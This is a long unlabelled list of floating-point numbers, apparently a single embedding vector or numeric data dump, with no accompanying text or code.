-0.023050108924508095, 0.003018958494067192, -0.016509607434272766, 0.007993183098733425, -0.019291041418910027, 0.011945024132728577, -0.018836649134755135, 0.009741907007992268, -0.02422051504254341, 0.0033597531728446484, -0.01262661349028349, -0.009253090247511864, 0.0001449022674933076, -0.007483712397515774, 0.01887795701622963, -0.01693646050989628, 0.05199355632066727, -0.008000068366527557, 0.024881450459361076, 0.011173932813107967, 0.016275525093078613, 0.019070729613304138, 0.0011807329719886184, -0.015008733607828617, -0.012509572319686413, -0.028557902202010155, 0.04733947291970253, -0.010932967066764832, 0.017776397988200188, 0.0034836784470826387, -0.010189414955675602, -0.016991538926959038, 0.0011996659450232983, -0.0008481139084324241, 0.003445812501013279, 0.0014277229784056544, -0.04227230325341225, -0.017377084121108055, -0.0073804412968456745, -0.0014905462739989161, 0.0011437274515628815, -0.02227901853621006, 0.0115044005215168, 0.016316834837198257, -0.004375252407044172, 0.03737036883831024, 0.011414899490773678, -0.01682630553841591, 0.02492275834083557, 0.01004483550786972, -0.015531973913311958, 0.043731868267059326, -0.005046514328569174, 0.001251301495358348, -0.010258262977004051, 0.048055484890937805, -0.034313544631004333, 0.01292265672236681, -0.010292686522006989, 0.006120534148067236, -0.001956987427547574, 0.02660263516008854, 0.022513100877404213, 0.030292855575680733, 0.004702277481555939, -0.016358142718672752, -0.04086781665682793, -0.020626680925488472, -0.010657577775418758, 0.0008631742675788701, 0.00828922726213932, 0.008254803717136383, 0.03946333006024361, -0.010657577775418758, 0.03329460322856903, -0.0013984628021717072, -0.0017676569987088442, 0.023752354085445404, -0.0014707526424899697, -0.01620667800307274, -0.01454057078808546, 0.009039663709700108, -0.006385596469044685, -0.021535467356443405, -0.007339132949709892, -0.013067237101495266, -0.0043201744556427, 0.014416646212339401, 0.00044750809320248663, 0.008213494904339314, -0.019965745508670807, 0.019139576703310013, -0.003979379776865244, -0.03648912161588669, -0.01047857478260994, -0.012454494833946228, 0.006543945521116257, -0.003734971396625042, 0.009494056925177574, 0.017115464434027672, -0.016371911391615868, 0.00859904009848833, 0.03155964985489845, -0.016303064301609993, -0.0031446050852537155, 0.020943379029631615, -0.033927999436855316, 0.012819386087357998, -0.0292463768273592, -0.013012158684432507, -0.009301284328103065, -0.015380509197711945, -0.007876142859458923, 0.008895084261894226, 0.0010180809767916799, -0.0187127236276865, 0.01460941880941391, -0.01865764521062374, -0.016385681927204132, 0.014829730615019798, 0.00006373763608280569, -0.007463058456778526, 0.00967994425445795, -0.006630004849284887, 0.019428737461566925, -0.0073184785433113575, 0.020158518105745316, -0.01077461801469326, -0.03180750086903572, 0.025914162397384644, -0.0016798765864223242, 0.022430483251810074, -0.0010120568331331015, 0.019291041418910027, 0.0001788956724340096, -0.018272100016474724, 0.007979413494467735, 0.006578369066119194, -0.009335707873106003, -0.03987641632556915, -0.01623421721160412, 0.02460606023669243, 0.0044785235077142715, 0.009301284328103065, -0.020970918238162994, -0.005810720846056938, -0.006234132219105959, -0.02916375920176506, -0.00844069104641676, -0.0024991605896502733, -0.020888300612568855, -0.009308168664574623, -0.01854749023914337, 0.013363280333578587, -0.0033081176225095987, -0.014499262906610966, -0.0052564991638064384, 0.00026205042377114296, -0.028310051187872887, -0.027525190263986588, -0.021618083119392395, 0.01257153507322073, 0.012323684990406036, -0.0048881652764976025, -0.012860694900155067, -0.01532543171197176, 0.012702345848083496, 0.0067229485139250755, -0.010926082730293274, 0.02686425670981407, 0.006330518517643213, 0.0015017339028418064, -0.003168701659888029, 0.0008610227960161865, -0.0036798936780542135, -0.00046127758105285466, 0.002206559292972088, 0.007242746651172638, -0.005153228063136339, 0.007490597199648619, -0.022884875535964966, -0.00846823025494814, 0.0010309898061677814, -0.014843499287962914, 0.021136151626706123, -0.015242815017700195, 0.00935636181384325, -0.002308109076693654, 0.007538790348917246, 0.018451103940606117, -0.006457886192947626, -0.0008472533081658185, -0.03172488138079643, -0.0019053518772125244, 0.005201421212404966, -0.007222092244774103, 0.016674840822815895, 0.018051788210868835, -0.010953621938824654, -0.012337454594671726, 0.004919146653264761, 0.012633497826755047, -0.020516525954008102, -0.03155964985489845, 0.0009130886755883694, -0.021149922162294388, -0.011235895566642284, 0.014361567795276642, 0.011511285789310932, 0.005053399130702019, -0.020778145641088486, -0.04163890704512596, 0.0032547609880566597, 0.011552593670785427, 0.0019414967391639948, 0.018671415746212006, 0.005222075153142214, 0.005886452738195658, -0.018533719703555107, 0.03654420003294945, -0.004413118585944176, 0.019649047404527664, -0.016482068225741386, -0.015352969989180565, -0.02773173339664936, -0.017859015613794327, -0.02357335016131401, -0.030981330201029778, 0.008351190015673637, -0.013549168594181538, -0.007012107875198126, -0.004743585828691721, 0.012096487917006016, -0.005122246686369181, 0.043952181935310364, -0.008757389150559902, 0.02357335016131401, -0.015242815017700195, -0.026230860501527786, 0.00216008722782135, 0.016509607434272766, -0.004850299563258886, 0.009776330552995205, 0.0038210307247936726, -0.017432162538170815, -0.0075663295574486256, 0.009142935276031494, -0.021728239953517914, -0.025487307459115982, -0.015642128884792328, 0.0021824627183377743, 0.0038279155269265175, -0.036847129464149475, 0.009624866768717766, 0.01205518003553152, 0.01590375043451786, -0.038527004420757294, 0.02019982784986496, -0.0006880437140353024, 0.05326034873723984, -0.019731665030121803, -0.009886486455798149, -0.0006605047383345664, -0.013618015684187412, -0.0003793061478063464, -0.011463092640042305, 0.023972665891051292, -0.010148107074201107, -0.022058706730604172, -0.03323952481150627, 0.0007018132018856704, -0.002908802591264248, -0.03227566182613373, 0.00014425681729335338, -0.022884875535964966, -0.0011308185057714581, -0.0008451018366031349, 0.0091704735532403, 0.028530362993478775, -0.019070729613304138, 0.006464770995080471, 0.04717423766851425, -0.024826372042298317, -0.013294433243572712, -0.015132659114897251, 0.020516525954008102, 0.004151498433202505, 0.007339132949709892, 0.022347865626215935, 0.01758362539112568, -0.020433908328413963, -0.008984586223959923, -0.007056858390569687, -0.004061996471136808, -0.0053012496791779995, 0.03946333006024361, -0.015435587614774704, 0.010354649275541306, -0.00465752650052309, -0.023463193327188492, 0.03321198746562004, -0.009301284328103065, -0.00973502267152071, 0.0027022603899240494, 0.002049931325018406, 0.012296145781874657, -0.023050108924508095, -0.010106798261404037, -0.03781099244952202, 0.008743619546294212, -0.008537077344954014, -0.039766259491443634, -0.024055281654000282, -0.022802259773015976, 0.014237642288208008, 0.010368418879806995, -0.0005421732785180211, 0.008172186091542244, 0.0332670658826828, 0.006395923439413309, -0.011015583761036396, 0.013562938198447227, -0.035249870270490646, 0.0039518410339951515, 0.010065490379929543, 0.008309881202876568, -0.02168693207204342, 0.01367997843772173, -0.018051788210868835, 0.02433067187666893, -0.007366671692579985, -0.00987271685153246, 0.0348367840051651, -0.00028915907023474574, 0.005910549312829971, -0.010402842424809933, 0.000978493713773787, 0.004313289653509855, 0.010740194469690323, -0.015642128884792328, 0.012254836969077587, -0.018974343314766884, 0.03208288922905922, -0.0049432432278990746, -0.015669668093323708, 0.02354581095278263, -0.00413084402680397, 0.01809309609234333, -0.01040972676128149, 0.012482034042477608, -0.0262446291744709, -0.030017467215657234, 0.025184379890561104, 0.016261756420135498, -0.012502687983214855, -0.036819588392972946, -0.012695460580289364, 0.005710891913622618, 0.007352902553975582, -0.012096487917006016, -0.023752354085445404, -0.019235963001847267, -0.032826442271471024, 0.016757456585764885, -0.010568075813353062, 0.021370233967900276, -0.0027573383413255215, -0.024771295487880707, -0.008853775449097157, -0.0172806978225708, -0.002647182671353221, 0.00009929086081683636, -0.002442361554130912, -0.020378829911351204, -0.005308134481310844, -0.026079395785927773, 0.005755642894655466, -0.034010615199804306, -0.007339132949709892, 0.012970849871635437, 0.012778077274560928, 0.02340811677277088, -0.008000068366527557, -0.003910532221198082, 0.025996778160333633, 0.02565254084765911, -0.027428803965449333, 0.014678265899419785, -0.008137762546539307, 0.028530362993478775, -0.009907141327857971, -0.0063270763494074345, -0.01944250613451004, -0.015642128884792328, 0.003478514961898327, 0.0004251326899975538, 0.017996709793806076, -0.04070258513092995, 0.0031032965052872896, -0.029934849590063095, 0.004919146653264761, 0.009728137403726578, 0.014099948108196259, -0.02289864607155323, 0.010960506275296211, -0.009920910932123661, -0.031119024381041527, -0.01525658369064331, -0.009080972522497177, 0.00031691318145021796, 0.0788165032863617, -0.014237642288208008, 0.0037866069469600916, 0.022568177431821823, 0.011290973983705044, -0.005690237507224083, 0.01969035714864731, -0.006506079342216253, -0.013032812625169754, -0.010148107074201107, 0.021948551759123802, -0.004519831854850054, 0.0013881357153877616, -0.00404478469863534, -0.006512964144349098, 0.0371500588953495, -0.007146360352635384, -0.0306784026324749, 0.02270587347447872, 0.004024130757898092, 0.002552517456933856, -0.009404554963111877, -0.010540537536144257, 0.009191128425300121, -0.01185552217066288, -0.02317403443157673, -0.028530362993478775, -0.010781503282487392, 0.03709498047828674, -0.0033855708315968513, 0.001590374973602593, -0.007222092244774103, 0.007600753102451563, -0.0018657646141946316, 0.009418324567377567, 0.025528615340590477, 0.0077315629459917545, -0.026588866487145424, 0.011022469028830528, -0.02368350513279438, -0.0135147450491786, -0.02000705525279045, 0.0012564650969579816, 0.03233074024319649, -0.011821098625659943, -0.018161945044994354, -0.021962320432066917, 0.0016721312422305346, 0.0029604381415992975, -0.0025008819065988064, 0.015669668093323708, -0.014815961010754108, -0.012041410431265831, 0.016316834837198257, -0.0001968605356523767, 0.040977973490953445, 0.014898577705025673, -0.008041376248002052, -0.015752285718917847, 0.0036454699002206326, -0.007965643890202045, 0.000776684726588428, -0.014636957086622715, 0.003803818952292204, -0.011587017215788364, 0.009101626463234425, 0.0033459835685789585, 0.013239354826509953, -0.008241034112870693, 0.022458022460341454, 0.03946333006024361, -0.005394193809479475, -0.0035284291952848434, -0.0004982830723747611, -0.0066678705625236034, -0.00483308732509613, 0.005459598731249571, -0.0025559598580002785, 0.014141255989670753, -0.0015757449436932802, -0.012006986886262894, -0.0044854083098471165, -0.02590039186179638, 0.010182530619204044, 0.006874412763863802, 0.01188306137919426, -0.03164226561784744, -0.02908114157617092, 0.02497783675789833, -0.001760772312991321, 0.027043258771300316, 0.024013973772525787, 0.006234132219105959, 0.00811710860580206, 0.02135646343231201, 0.028144817799329758, 0.013831443153321743, 0.012564650736749172, -0.024619830772280693, -0.037425447255373, 0.015518204309046268, 0.008936393074691296, 0.01191060058772564, 0.018809109926223755, 0.009638636372983456, 0.01660599373281002, 0.009349477477371693, 0.017005307599902153, 0.006330518517643213, 0.02390381693840027, -0.01657845452427864, -0.005469926167279482, 0.0073873260989785194, -0.02508799359202385, -0.00900524016469717, -0.008674772456288338, 0.005855471361428499, 0.012654152698814869, 0.020241135731339455, 0.000957839481998235, -0.01671614870429039, -0.024069052189588547, 0.01620667800307274, -0.0061274184845387936, 0.015242815017700195, 0.025019144639372826, -0.013039697892963886, 0.00008320853521581739, -0.0010628317249938846, 0.028199896216392517, 0.017487239092588425, 0.022347865626215935, 0.01784524694085121, 0.009239321574568748, 0.016316834837198257, 0.0061343032866716385, 0.012564650736749172, 0.014815961010754108, -0.0010843465570360422, -0.0223616361618042, -0.013039697892963886, 0.032771363854408264, -0.019263502210378647, 0.017652474343776703, -0.00567646836861968, -0.021425310522317886, -0.02101222611963749, 0.0431535504758358, 0.009900256060063839, -0.0022788490168750286, 0.008833121508359909, -0.03222058340907097, 0.0026162012945860624, 0.01529789250344038, -0.005129131488502026, -0.011986332945525646, 0.01868518441915512, -0.009142935276031494, 0.01974543370306492, -0.0022891759872436523, 0.022678334265947342, -0.013989792205393314, 0.0064337896183133125, 0.028805753216147423, 0.01761116459965706, 0.018106866627931595, -0.003621373325586319, -0.039766259491443634, 0.001167824026197195, -0.0063098641112446785, 0.0164958368986845, -0.004815875552594662, -0.024371979758143425, 0.021563006564974785, -0.022237710654735565, 0.007931220345199108, 0.011779790744185448, -0.006829662248492241, 0.022857336327433586, -0.007435519248247147, -0.0019208424491807818, -0.006168727297335863, -0.009893371723592281, 0.0007977692293934524, 0.009094742126762867, -0.024702446535229683, 0.00937013141810894, 0.017239389941096306, -0.02770419418811798, -0.0120827192440629, -0.0045990063808858395, 0.05199355632066727, -0.005969069432467222, -0.01725315861403942, 0.02028244361281395, 0.022802259773015976, -0.002767665544524789, -0.01385209709405899, -0.02373858354985714, -0.010547421872615814, 0.013239354826509953, -0.021425310522317886, -0.01147686131298542, 0.011063776910305023, 0.0005486277514137328, -0.022719642147421837, 0.001874370500445366, -0.0021411541383713484, 0.0028124162927269936, 0.015008733607828617, 0.014994964003562927, -0.008185955695807934, 0.00026355645968578756, -0.007118821144104004, -0.003996591549366713, -0.0031446050852537155, -0.003796934150159359, -0.021370233967900276, 0.018519951030611992, -0.014843499287962914, -0.0007857209420762956, 0.01904319040477276, -0.013266894035041332, 0.025363381952047348, 0.027497651055455208, 0.002734963083639741, -0.0013408031081780791, -0.019731665030121803, 0.014127486385405064, 0.02109484374523163, 0.013886520639061928, 0.016385681927204132, -0.012213529087603092, -0.002165250713005662, -0.01458187960088253, 0.013005274347960949, 0.03855454549193382, -0.008461345918476582, 0.00506372656673193, 0.02225147932767868, 0.03662681579589844, 0.01242007128894329, -0.012337454594671726, -0.011311627924442291, -0.01042349636554718, -0.00025279904366470873, 0.010079259052872658, -0.01151817012578249, -0.01531166210770607, 0.010692001320421696, 0.020860763266682625, -0.018698954954743385, 0.01857502944767475, -0.0006910557858645916, 0.012860694900155067, 0.04290569946169853, -0.005931203719228506, 0.028530362993478775, 0.013673094101250172, -0.028530362993478775, 0.007208323106169701, -0.05138770118355751, 0.007304709404706955, -0.00866788811981678, -0.00693293334916234, 0.02098468691110611, -0.012778077274560928, -0.010382188484072685, 0.005528446286916733, 0.0030103526078164577, 0.0009449305944144726, -0.031091487035155296, 0.010609384626150131, -0.0227334126830101, -0.005511234514415264, 0.019896898418664932, 0.017859015613794327, -0.018161945044994354, 0.006839989218860865, -0.011346051469445229, -0.02387627772986889, 0.012826270423829556, -0.006753929890692234, -0.015394278801977634, 0.006530175916850567, -0.02365596778690815, -0.028530362993478775, -0.014237642288208008, -0.0361311174929142, -0.0004251326899975538, -0.010981160216033459, 0.030210239812731743, 0.011979447677731514, -0.0028537248726934195, -0.004667853936553001, 0.03748052567243576, -0.014815961010754108, 0.011614556424319744, 0.01205518003553152, -0.0051876516081392765, 0.016440758481621742, 0.03183503821492195, 0.014719574712216854, 0.0006140327313914895, -0.019786743447184563, -0.01739085279405117, -0.012268606573343277, -0.035415101796388626, 0.0007018132018856704, -0.001996574690565467, 0.01292265672236681, 0.0011833147145807743, -0.010698885656893253, 0.014513032510876656, 0.0004728955973405391, 0.005586966406553984, 0.03048563003540039, -0.005383866839110851, 0.000014361137800733559, 0.00987271685153246, -0.011642095632851124, -0.008096454665064812, -0.011483746580779552, -0.015215275809168816, 0.01582113280892372, -0.032743822783231735, -0.012213529087603092, 0.004206576384603977, 0.007290939800441265, -0.004378694575279951, 0.003168701659888029, -0.004819318186491728, -0.005831374786794186, -0.003948398400098085, 0.0025404691696166992, -0.024082820862531662, 0.013976022601127625, -0.005869240965694189, -0.019814282655715942, 0.0007878724718466401, -0.02141154184937477, 0.035607874393463135, 0.010375303216278553, -0.024206746369600296, -0.0053184619173407555, -0.004681623075157404, 0.010003527626395226, -0.000316267745802179, -0.020048363134264946, -0.004915704485028982, -0.02022736705839634, 0.017266927286982536, 0.024316901341080666, 0.007407980505377054, 0.003824473125860095, 0.0066162352450191975, -0.010216954164206982, 0.0016884824726730585, 0.018643876537680626, 0.0135147450491786, -0.026217089965939522, 0.025693850591778755, -0.006788353901356459, -0.0007551699527539313, 0.006602465640753508, -0.013308202847838402, 0.011346051469445229, 0.01582113280892372, -0.020805684849619865, 0.02629970759153366, -0.0029948619194328785, -0.013817673549056053, -0.024027742445468903, 0.02590039186179638, 0.011745366267859936, -0.008840005844831467, 0.011222125962376595, 0.0201447494328022, 0.002950111171230674, -0.0010008690878748894, 0.001184175256639719, -0.023724814876914024, 0.01009991392493248, 0.007765986956655979, -0.007228977046906948, 0.017831476405262947, -0.00009929086081683636, 0.0058382595889270306, -0.001936333137564361, 0.023890048265457153, -0.006179054267704487, 0.01750100962817669, -0.01078838761895895, 0.01666107028722763, -0.015408048406243324, 0.03646158427000046, -0.0013459667097777128, -0.016812535002827644, -0.010457919910550117, 0.0048984927125275135, 0.03348737582564354, -0.005624832585453987, 0.01119458768516779, 0.01040972676128149, -0.01136670634150505, 0.003037891583517194, -0.025239456444978714, -0.01960773952305317, 0.03591080382466316, -0.02349073253571987, 0.011346051469445229, 0.00845446065068245, 0.009363246150314808, 0.0015817690873518586, 0.0023184362798929214, 0.0003429461212363094, -0.0038382424972951412, 0.02000705525279045, -0.022760950028896332, -0.00012661467189900577, -0.0004535322659648955, 0.0074424040503799915, -0.022581947967410088, -0.01893303543329239, 0.04337386414408684, -0.0207919143140316, -0.013948483392596245, 0.0006781468982808292, -0.004588679410517216, -0.02200363017618656, -0.011724712327122688, 0.005635159555822611, 0.002950111171230674, 0.0024131014943122864, 0.042162150144577026, 0.014430414885282516, -0.008743619546294212, -0.020075902342796326, -0.020915839821100235, 0.0023184362798929214, 0.0033356565982103348, -0.008592155762016773, -0.026822946965694427, 0.006099879741668701, -0.020612912252545357, -0.019263502210378647, -0.003086084732785821, 0.0043614828027784824, 0.01828587055206299, -0.017266927286982536, 0.01652337610721588, 0.021838394924998283, 0.018781570717692375, -0.0009638636256568134, 0.013858981430530548, 0.017652474343776703, 0.00976256188005209, 0.010554306209087372, -0.012475148774683475, 0.00807579979300499, 0.0017203243914991617, 0.0008515563094988465, 0.029907310381531715, 0.005593851208686829, 0.023972665891051292, 0.032743822783231735, 0.008750504814088345, 0.002206559292972088, 0.0003997452149633318, 0.015408048406243324, 0.021370233967900276, -0.007993183098733425, 0.0008179931901395321, -0.00693293334916234, 0.015504434704780579, 0.011690288782119751, -0.02579023689031601, 0.000048381436499767005, -0.00585202919319272, -0.005084380507469177, -0.01115327887237072, 0.008364959619939327, -0.006602465640753508, -0.0007091282168403268, -0.014037985354661942, 0.0227334126830101, 0.004667853936553001, -0.008433806709945202, 0.0073804412968456745, 0.009225551970303059, 0.027043258771300316, 0.0023838412016630173, -0.009500941261649132, 0.032991673797369, 0.0012383926659822464, 0.001969035714864731, -0.0010241051204502583, 0.0070981672033667564, 0.0073115942068398, -0.004275423474609852, -0.010664462111890316, -0.015408048406243324, 0.005018975585699081, -0.0017693781992420554, 0.01854749023914337, 0.032688744366168976, -0.025983009487390518, 0.004574909806251526, 0.01671614870429039, 0.0025077664759010077, -0.010258262977004051, 0.009129165671765804, -0.01385209709405899, 0.01674368791282177, 0.0029690442606806755, 0.0047745672054588795, -0.01046480517834425, 0.003586949547752738, 0.020323753356933594, -0.0020740278996527195, -0.0058451443910598755, 0.023022571578621864, 0.003621373325586319, -0.025046683847904205, -0.008798697963356972, 0.03337721899151802, -0.0011230732779949903, -0.007394210901111364, 0.005969069432467222, -0.021204998716711998, 0.005328788887709379, 0.01277119293808937, -0.010037951171398163, -0.05838259682059288, -0.009308168664574623, 0.002139433054253459, -0.019401198253035545, 0.002003459259867668, -0.0019931322894990444, -0.0009337428491562605, 0.010278916917741299, -0.0009724695119075477, 0.0026850486174225807, 0.026905564591288567, -0.002266800729557872, -0.0035697377752512693, -0.011414899490773678, -0.011469976976513863, -0.0021463176235556602, -0.010093028657138348, -0.004981109406799078, -0.019263502210378647, -0.0022186075802892447, 0.0015611147973686457, 0.0010817648144438863, -0.006650658790022135, -0.012020756490528584, -0.010705770924687386, -0.005883010569959879, -0.003234106581658125, -0.002864051843062043, 0.011229011230170727, 0.027993353083729744, 0.010547421872615814, 0.00824791844934225, 0.0006506079225800931, -0.0009122280753217638, 0.004223788157105446, 0.004974224604666233, 0.009741907007992268, 0.021921012550592422, 0.011951908469200134, 0.006423462647944689, -0.00504995696246624, -0.0010731588117778301, 0.0019673143979161978, 0.013507859781384468, -0.006251343991607428, 0.026533788070082664, 0.00899147056043148, 0.010857234708964825, 0.01955266110599041, 0.002740126568824053, 0.0031514898873865604, -0.010905427858233452, -0.029797155410051346, 0.0022908973041921854, 0.003907090052962303, -0.031063947826623917, 0.01930481195449829, 0.02773173339664936, 0.025211919099092484, -0.01155947893857956, -0.011263434775173664, 0.008481999859213829, -0.021136151626706123, 0.0015688601415604353, 0.027580268681049347, 0.010416612029075623, 0.01100181508809328, -0.004037899896502495, 0.01941496692597866, 0.014939885586500168, 0.0036041615530848503, -0.0022082803770899773, 0.005067168734967709, 0.021191230043768883, -0.02163185365498066, -0.016977768391370773, -0.009087856858968735, 0.01188306137919426, -0.01191060058772564, -0.00014425681729335338, 0.002970765344798565, -0.015366739593446255, -0.010994929820299149, 0.0075663295574486256, -0.00234941765666008, -0.008268572390079498, 0.013439012691378593, 0.023105187341570854, 0.00038253338425420225, 0.00827545765787363, -0.01787278614938259, -0.007401095703244209, 0.016082752496004105, 0.0060723405331373215, -0.03230319917201996, 0.008082685060799122, -0.004099862650036812, 0.01076084841042757, 0.021136151626706123, -0.013721287250518799, 0.005796951241791248, -0.005972512066364288, 0.0470365434885025, -0.01874026283621788, -0.01930481195449829, 0.00880558229982853, 0.013411473482847214, 0.003294348018243909, 0.0006445837789215147, -0.003982821945101023, -0.00020148622570559382, -0.017914094030857086, 0.01348720584064722, 0.01798294112086296, -0.013308202847838402, -0.011132624931633472, -0.0007401095353998244, 0.013012158684432507, 0.036929745227098465, -0.004974224604666233, 0.0032444337848573923, -0.010251377709209919, -0.003437206381931901, 0.0010103356325998902, 0.005535331089049578, 0.0005907967570237815, 0.002740126568824053, 0.04301585629582405, 0.013321972452104092, -0.002082633785903454, 0.011263434775173664, 0.012908888049423695, -0.009810755029320717, 0.009232436306774616, 0.016165370121598244, 0.012750538997352123, -0.0032530396711081266, -0.013797019608318806, 0.016440758481621742, -0.014079293236136436, 0.0014380500651896, -0.011827983893454075, -0.019814282655715942, -0.00468506570905447, -0.0023838412016630173, 0.001895024674013257, -0.020888300612568855, -0.00047031379654072225, 0.018217021599411964, 0.022595716640353203, -0.007235861849039793, 0.02629970759153366, -0.00040146641549654305, 0.012998389080166817, -0.01784524694085121, 0.013817673549056053, 0.011628326028585434, -0.0006652380106970668, 0.0032375489827245474, -0.03621373325586319, -0.0013192882761359215, 0.00521174818277359, -0.03467155247926712, -0.0027711079455912113, -0.007855487987399101, 0.004784894175827503, -0.0026626731269061565, -0.0026643944438546896, 0.005335673689842224, 0.0013846933143213391, -0.0032186158932745457, -0.013046582229435444, -0.007056858390569687, 0.0028175797779113054, 0.0029346204828470945, 0.0018606010125949979, -0.000500864814966917, 0.01798294112086296, -0.017721321433782578, 0.005569754634052515, 0.000023235998014570214, -0.0030964119359850883, -0.014843499287962914, -0.012722999788820744, -0.016564683988690376, 0.019318580627441406, -0.010210069827735424, -0.005686795338988304, -0.0030172374099493027, -0.006709179375320673, 0.0013330577639862895, -0.003628258127719164, -0.010946736671030521, -0.001098976586945355, -0.011304743587970734, -0.019883129745721817, 0.014705805107951164, 0.01332885678857565, -0.00004036716927657835, 0.01009991392493248, -0.006767699494957924, -0.000022509871996589936, -0.015118889510631561, 0.001943217939697206, -0.0039002052508294582, -0.007580098696053028, 0.0005718637257814407, 0.021728239953517914, 0.026919333264231682, -0.005321904085576534, -0.01531166210770607, -0.004402791149914265, 0.012564650736749172, -0.007005223073065281, 0.0012934705009683967, -0.02376612275838852, 0.004344271030277014, -0.0012185990344733, 0.028502823784947395, 0.008027606643736362, 0.01593128778040409, -0.002638576552271843, 0.002397610805928707, 0.009487171657383442, 0.029742076992988586, -0.00639248127117753, -0.01795540191233158, -0.002029277151450515, 0.010953621938824654, 0.000566700182389468, 0.011249665170907974, 0.012957081198692322, -0.023724814876914024, -0.012482034042477608, -0.01947004534304142, 0.020433908328413963, -0.007256516255438328, -0.005438944790512323, -0.001336500165052712, 0.01262661349028349, -0.009225551970303059, -0.0005167857743799686, -0.012364992871880531, 0.026313476264476776, -0.0074492888525128365, 0.0038382424972951412, 0.014347798191010952, 0.016812535002827644, -0.021989859640598297, -0.004523274023085833, 0.0015869325725361705, 0.026038087904453278, -0.027910735458135605, -0.032633669674396515, -0.0004815015126951039, -0.009046548046171665, -0.031091487035155296, -0.014967424795031548, 0.0066678705625236034, -0.023559581488370895, -0.008778044022619724, -0.007435519248247147, 0.013390819542109966, -0.02643740177154541, -0.022182632237672806, 0.0194975845515728, -0.00827545765787363, 0.0086403489112854, -0.022210171446204185, -0.0009630030253902078, -0.0029019180219620466, -0.0008149811183102429, 0.014994964003562927, 0.005883010569959879, 0.015022503212094307, 0.0065026371739804745, -0.011380475014448166, 0.012482034042477608, -0.0027642231434583664, -0.020406369119882584, 0.005253056529909372, -0.030045006424188614, -0.0012908887583762407, 0.0008950161864049733, 0.004946685861796141, 0.007180783897638321, 0.010258262977004051, 0.009239321574568748, -0.018891727551817894, 0.0013468272518366575, -0.015518204309046268, -0.006564599461853504, -0.015449357219040394, -0.015050041489303112, -0.012881348840892315, 0.027208492159843445, -0.0016566405538469553, -0.012729884125292301, 0.0034888419322669506, -0.02179708704352379, 0.016592223197221756, 0.008984586223959923, -0.017170540988445282, -0.012468264438211918, -0.01386586669832468, -0.008853775449097157, 0.008165301755070686, -0.024179207161068916, -0.010822811163961887, 0.006788353901356459, 0.010712655261158943, 0.0008476836374029517, -0.005452713929116726, 0.026478709653019905, -0.012874463573098183, 0.003074036445468664, -0.0366818942129612, 0.0028072528075426817, 0.013432128354907036, 0.007490597199648619, 0.007807295303791761, 0.0027848773170262575, 0.000705255544744432, 0.02176954783499241, -0.02784188836812973, -0.0065542724914848804, -0.011690288782119751, 0.03599341958761215, 0.013955367729067802, -0.008192840963602066, -0.008110224269330502, 0.014430414885282516, -0.0025594020262360573, 0.0055387732572853565, -0.008833121508359909, -0.023945126682519913, -0.0060207052156329155, -0.021728239953517914, 0.010781503282487392, 0.010368418879806995, -0.010519882664084435, 0.01615159958600998, -0.017239389941096306, 0.014113716781139374, 0.018217021599411964, -0.0291086807847023, 0.0023924470879137516, 0.020571602508425713, 0.020860763266682625, -0.011201472021639347, -0.009790100157260895, -0.013370165601372719, -0.0007512972806580365, 0.009452748112380505, 0.0231464970856905, -0.01947004534304142, -0.027043258771300316, 0.0008085266454145312, -0.005934645887464285, 0.0058451443910598755, 0.02070929855108261, 0.00897770095616579, -0.012667921371757984, -0.01969035714864731, 0.000994844944216311, 0.01473334338515997, 0.007132590748369694, 0.024785064160823822, -0.005673025734722614, -0.012530227191746235, 0.018396025523543358, 0.004185921978205442, -0.009053433313965797, 0.0040034763514995575, 0.012151566334068775, -0.04152875393629074, -0.002194511005654931, -0.008537077344954014, 0.009039663709700108, -0.00423411512747407, 0.01277119293808937, 0.007759102154523134, 0.008853775449097157, -0.00602759001776576, -0.006282325368374586, -0.031532108783721924, 0.016303064301609993, -0.013714401982724667, 0.00021600871696136892, 0.004812433384358883, 0.00283823418430984, -0.012027640827000141, 0.004464753903448582, 0.0004952710005454719, -0.001597259659320116, -0.02160431444644928, 0.004447542130947113, -0.008220379240810871, -0.003302954137325287, 0.007180783897638321, 0.02225147932767868, -0.014416646212339401, -0.02019982784986496, -0.0018451103242114186, -0.011951908469200134, -0.03191765397787094, 0.010182530619204044, -0.011993217281997204, 0.006296094972640276, -0.01184175256639719, -0.017776397988200188, -0.012117142789065838, -0.0063201915472745895, 0.010905427858233452, 0.006154957693070173, 0.00009724695701152086, -0.00039113929960876703, 0.017101693898439407, -0.004261654336005449, -0.009067202918231487, -0.004633429925888777, 0.00030099222203716636, -0.002571450313553214, -0.02011721022427082, -0.02154923602938652, 0.009390785358846188, -0.02919129841029644, -0.003296069335192442, -0.02219640277326107, 0.00969371385872364, 0.022100016474723816, 0.0009346034494228661, -0.013349510729312897, -0.03599341958761215, 0.012502687983214855, -0.009948449209332466, -0.007277170196175575, 0.01938742771744728, -0.013067237101495266, 0.0135147450491786, 0.0016334046376869082, -0.011945024132728577, 0.0046609691344201565, -0.014444184489548206, -0.010932967066764832, -0.004664411302655935, 0.004371809773147106, -0.014334028586745262, 0.0027865986339747906, -0.04141859710216522, -0.007821064442396164, 0.005180766806006432, -0.007256516255438328, -0.032826442271471024, -0.008055145852267742, 0.014292720705270767, -0.008364959619939327, 0.005707449745386839, 0.005535331089049578, 0.012199759483337402, -0.0033666379749774933, 0.0045921215787529945, 0.006172169465571642, 0.028199896216392517, 0.006086110137403011, 0.016344372183084488, -0.008736735209822655, -0.013260009698569775, -0.039848875254392624, 0.006908836774528027, 0.0021308271680027246, 0.015628360211849213, 0.004192806780338287, 0.012543996796011925, 0.004034457728266716, 0.008688542060554028, 0.0024131014943122864, 0.013480321504175663, 0.017735090106725693, -0.026822946965694427, -0.018698954954743385, -0.008716081269085407, 0.016385681927204132, -0.010492343455553055, -0.000544755079317838, -0.02011721022427082, -0.023724814876914024, -0.0033855708315968513, 0.0048881652764976025, -0.0028141376096755266, -0.011834868229925632, -0.02463359944522381, 0.0007981995586305857, -0.003621373325586319, -0.0016368469223380089, 0.011972563341259956, 0.010795272886753082, 0.01876780204474926, -0.009321938268840313, -0.012537111528217793, 0.024179207161068916, 0.02003459446132183, 0.006227247416973114, 0.007531905546784401, -0.008296111598610878, 0.0377008356153965, 0.013432128354907036, 0.012819386087357998, 0.0005451853503473103, -0.031394414603710175, 0.012970849871635437, -0.005759085062891245, 0.019153347238898277, 0.01868518441915512, 0.016922691836953163, -0.0033408200833946466, 0.0146231884136796, -0.000907064531929791, 0.02306387946009636, -0.020075902342796326, -0.01100181508809328, 0.007772871758788824, 0.005965627264231443, -0.013556052930653095, 0.013170507736504078, -0.00880558229982853, -0.0038210307247936726, 0.009920910932123661, -0.003762510372325778, 0.011945024132728577, -0.014705805107951164, 